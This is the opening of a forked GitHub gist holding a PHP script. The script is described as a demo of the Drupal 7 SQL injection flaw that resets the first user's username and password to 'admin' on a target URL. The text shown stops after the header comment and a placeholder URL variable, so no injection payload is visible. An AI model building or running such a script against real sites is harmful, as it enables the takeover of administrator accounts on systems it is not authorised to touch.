COBadger jordanlgraham
jordanlgraham
/ drupal_passChange.php
Created
October 4, 2024 15:09
— forked from milankragujevic/drupal_passChange.php
Exploiting Drupal 7's SQL Injection vulnerability to change the admin user's password. http://milankragujevic.com/post/66
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /******************************************************** | |
| * Drupal 7 SQL Injection vulnerability demo | |
| * Created by Milan Kragujevic (of milankragujevic.com) | |
| * Read more at http://milankragujevic.com/post/66 | |
| * This will change the first user's username to admin | |
| * and their password to admin | |
| * Change $url to the website URL | |
| ********************************************************/ | |
| $url = '[URL HERE]'; // URL of the website (http://domain.com/) |